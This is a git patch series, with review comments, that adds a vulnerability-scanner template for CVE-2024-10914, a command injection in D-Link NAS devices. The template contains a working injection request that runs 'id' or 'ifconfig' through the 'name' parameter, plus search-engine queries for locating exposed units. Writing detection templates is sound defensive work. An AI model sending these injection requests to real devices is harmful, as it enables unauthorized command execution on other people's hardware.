From 6769c9eba17abc2a90c79d3d2ef9aec2d775a3a9 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Tue, 12 Nov 2024 02:14:36 +0300
Subject: [PATCH 1/3] add cve-2024-10914
---
 http/cves/2024/CVE-2024-10914.yaml | 42 ++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-10914.yaml
diff --git a/http/cves/2024/CVE-2024-10914.yaml b/http/cves/2024/CVE-2024-10914.yaml
new file mode 100644
index 00000000000..0b8a6c1a32d
--- /dev/null
+++ b/http/cves/2024/CVE-2024-10914.yaml
@@ -0,0 +1,42 @@
+id: CVE-2024-10914
+
+info:
+ name: D-Link NAS - Command Injection via Name Parameter
+ author: s4e-io
+ severity: critical
+ description: |
+ A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been declared as critical. Affected by this vulnerability is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument name leads to os command injection.
+ reference:
+ - https://github.com/verylazytech/CVE-2024-10914
+ - https://www.usom.gov.tr/bildirim/tr-24-1836
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-10914
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-10914
+ cwe-id: CWE-707
+ epss-score: 0.00092
+ epss-percentile: 0.40606
+ cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:*
+ metadata:
+ vendor: dlink
+ product: dns-320_firmware
+ shodan-query: http.html:"sharecenter"
+ fofa-query: body="sharecenter"
+ tags: cve,cve2024,dlink,sharecenter,rce
+
+variables:
+ num: "{{rand_base(12)}}"
+
+http:
+ - raw:
+ - |
+ GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20{{num}};%27 HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "{{num}}")'
+ - "status_code == 200"
+ condition: and
From 95da466d1f2347da021b8de002514bfc3b2a3b96 Mon Sep 17 00:00:00 2001
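Review bot: `cwe-id: CWE-707` in the classification block names the generic "Improper Neutralization" pillar, while the description itself states that the outcome is OS command injection, whose specific weakness is CWE-78; if the NVD record for this CVE lists CWE-78 (not visible in the patch, please confirm), `cwe-id: CWE-78` is the more useful value for anyone filtering templates by weakness class. The `cpe` and `metadata.product` fields name only `dns-320_firmware`, whereas the description lists DNS-320LW, DNS-325 and DNS-340L as affected as well; since the template carries a single cpe, a short sentence in the description saying that the cpe reflects only one of the affected models would keep the scope from being under-read.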
From: Kazgangap
Date: Tue, 12 Nov 2024 02:23:15 +0300
Subject: [PATCH 2/3] fix
---
 http/cves/2024/CVE-2024-10914.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/http/cves/2024/CVE-2024-10914.yaml b/http/cves/2024/CVE-2024-10914.yaml
index 0b8a6c1a32d..3b2bb9f3f6f 100644
--- a/http/cves/2024/CVE-2024-10914.yaml
+++ b/http/cves/2024/CVE-2024-10914.yaml
@@ -26,17 +26,17 @@ info:
 tags: cve,cve2024,dlink,sharecenter,rce
 variables:
- num: "{{rand_base(12)}}"
+ random: "{{rand_base(12)}}"
 http:
 - raw:
 - |
- GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20{{num}};%27 HTTP/1.1
+ GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20{{random}};%27 HTTP/1.1
 Host: {{Hostname}}
 matchers:
 - type: dsl
 dsl:
- - 'contains(body, "{{num}}")'
+ - 'contains_all(body, "{{random}}", "Content-type: text/html")'
 - "status_code == 200"
 condition: and
From 82cc7b0e381b6f013cafe1673e87a7591055806c Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 13 Nov 2024 14:10:42 +0530
Subject: [PATCH 3/3] updated payload
---
 http/cves/2024/CVE-2024-10914.yaml | 20 +++++++++++++++-----
 1 file changed, 15 insertions(+), 5 deletions(-)
diff --git a/http/cves/2024/CVE-2024-10914.yaml b/http/cves/2024/CVE-2024-10914.yaml
index 3b2bb9f3f6f..7a19784ba3b 100644
--- a/http/cves/2024/CVE-2024-10914.yaml
+++ b/http/cves/2024/CVE-2024-10914.yaml
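Review bot: The new matcher looks for `Content-type: text/html` inside `body` rather than in the response headers, and nothing in the template says why; presumably the CGI's own header line ends up in the body once the injected command disturbs its output, and that is what makes the check discriminating, but that is inferred rather than visible here. A one-line comment above the dsl entry, `# intentional: the Content-type line is expected in the response body, not the headers`, would stop the next editor from rewriting it as a header match. The same body check is carried over as the second matcher in patch 3/3 of this series, so the comment belongs there as well.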
@@ -25,18 +25,28 @@ info:
 fofa-query: body="sharecenter"
 tags: cve,cve2024,dlink,sharecenter,rce
-variables:
- random: "{{rand_base(12)}}"
-
 http:
 - raw:
 - |
- GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20{{random}};%27 HTTP/1.1
+ GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;{{command}};%27 HTTP/1.1
 Host: {{Hostname}}
+ payloads:
+ command:
+ - "id"
+ - "ifconfig"
+
+ stop-at-first-match: true
+ matchers-condition: and
 matchers:
 - type: dsl
 dsl:
- - 'contains_all(body, "{{random}}", "Content-type: text/html")'
+ - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)"
+ - "contains_all(body, 'inet addr:', 'Mask:')"
+ condition: or
+
+ - type: dsl
+ dsl:
+ - 'contains(body, "Content-type: text/html")'
 - "status_code == 200"
 condition: and
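Review bot: The `command` payload list runs two different commands on the target to confirm one finding, and the second, `ifconfig`, returns the device's interface addressing, which then sits in the scan output of every host that matches on it; `id` alone already proves execution, and with `stop-at-first-match: true` the second payload only runs when the first did not match, so unless `id` is known to be absent on some of the listed firmware builds (cannot be told from the patch), keeping only `- "id"` gives the same verdict while collecting less data from the device. The regex `'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)'` places literal parentheses inside a character class, which reads like a mistyped group; a comment such as `# character class deliberately includes ( and ) so uid=0(root) matches` would make the intent clear. The `info` block still carries no `remediation` field; adding `remediation: <vendor guidance for affected units - confirm against the D-Link advisory>` would tell a user who gets a hit what to do with the unit rather than only that it is exploitable.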